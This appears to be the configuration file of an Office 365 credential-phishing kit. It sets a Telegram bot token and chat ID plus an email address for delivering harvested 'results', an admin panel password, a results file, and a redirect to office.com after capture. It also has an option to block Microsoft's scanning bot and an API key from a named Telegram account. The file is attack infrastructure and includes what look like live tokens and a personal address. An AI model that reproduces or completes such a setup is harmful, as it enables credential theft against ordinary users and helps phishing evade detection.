;Your bot token here
bot="6388285272:AAFnjHMHiv7JguR1z4UXxmfUQxH-UVyXi2g"
;Your Chat Id here
chat="1735317958"
;Name You can change your name here
name="0DayOFD00M"
;your admin panel password
password="abf95cb47f6e7501d98"
;Your email for results here
email='jhm10073@outlook.com';
;Your Redirect Url Here
finish="https://office.com/?auth=2"
;your whitelisted ip
ip = ""
;To send visits or not 1/0
send_visit="0"
;To block microsoft bot set to 1
block_bot="1"
;Your file name to save your results
results_file="rets.txt"
;Your api key here,you can get one from @fisherstell
api="9b410da76ec7ffc3bb6f998f380aec028ec7236347af76c603"